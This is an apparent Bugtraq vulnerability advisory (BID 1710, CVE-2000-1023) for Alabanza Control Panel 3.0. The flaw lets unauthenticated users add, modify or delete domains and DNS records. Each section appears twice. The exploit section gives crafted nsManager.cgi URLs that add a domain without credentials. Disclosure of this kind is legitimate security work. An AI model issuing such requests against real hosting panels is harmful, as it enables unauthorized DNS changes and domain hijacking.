Alabanza Control Panel Domain Modification Vulnerability
BID:1710
Info
Alabanza Control Panel Domain Modification Vulnerability
| Bugtraq ID: | 1710 |
| Class: | Access Validation Error |
| CVE: |
CVE-2000-1023 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Sep 24 2000 12:00AM |
| Updated: | Jul 11 2009 03:56AM |
| Credit: | Posted to Bugtraq on September 24, 2000 by Weihan Leow <[email protected]>. |
| Vulnerable: |
Alabanza Control Panel 3.0 |
| Not Vulnerable: | |
Discussion
Alabanza Control Panel Domain Modification Vulnerability
Alabanza is a web hosting provider that offers automated solutions for virtual domain hosting. A vulnerability exists in the software implemented for automated domain administration.
Modification, deletion, and addition of domains and MX and CNAME records associated with Alabanza hosts and resellers does not require valid authentication and can be conducted by any remote user.
Access to the Control Panel which handles administrative controls for domains associated with Alabanza does not require a username and password if specially crafted URLs are requested (see the exploit tab for further details).
Alabanza is a web hosting provider that offers automated solutions for virtual domain hosting. A vulnerability exists in the software implemented for automated domain administration.
Modification, deletion, and addition of domains and MX and CNAME records associated with Alabanza hosts and resellers does not require valid authentication and can be conducted by any remote user.
Access to the Control Panel which handles administrative controls for domains associated with Alabanza does not require a username and password if specially crafted URLs are requested (see the exploit tab for further details).
Exploit / POC
Alabanza Control Panel Domain Modification Vulnerability
To add a domain to the name server (using example.com as an example and 'target' being an Alabanza host/reseller domain):
http://target/cp/rac/nsManager.cgi?Domain=<example.com>&IP=<IP address>&OP=add&Language=english&Submit=Confirm
Accessing the following URL:
http://www.example.com/cp/rac/nsManager.cgi?Domain=HAHAHA.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm
will display a page stating:
"Name Server Manager
Domain example.com will be added within 1 hour!
Your domain example.com <IP address> will be setup within 1 hour!
Please click here to go back."
From here modification, deletion, and addition of domains can be made, as well as changing the default MX or CNAME records.
To add a domain to the name server (using example.com as an example and 'target' being an Alabanza host/reseller domain):
http://target/cp/rac/nsManager.cgi?Domain=<example.com>&IP=<IP address>&OP=add&Language=english&Submit=Confirm
Accessing the following URL:
http://www.example.com/cp/rac/nsManager.cgi?Domain=HAHAHA.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm
will display a page stating:
"Name Server Manager
Domain example.com will be added within 1 hour!
Your domain example.com <IP address> will be setup within 1 hour!
Please click here to go back."
From here modification, deletion, and addition of domains can be made, as well as changing the default MX or CNAME records.
Solution / Fix
Alabanza Control Panel Domain Modification Vulnerability
Solution:
A security patch has been applied to remedy the problem. Scripts that had been disabled to prevent this vulnerablity have once again been restored to normal status.
Solution:
A security patch has been applied to remedy the problem. Scripts that had been disabled to prevent this vulnerablity have once again been restored to normal status.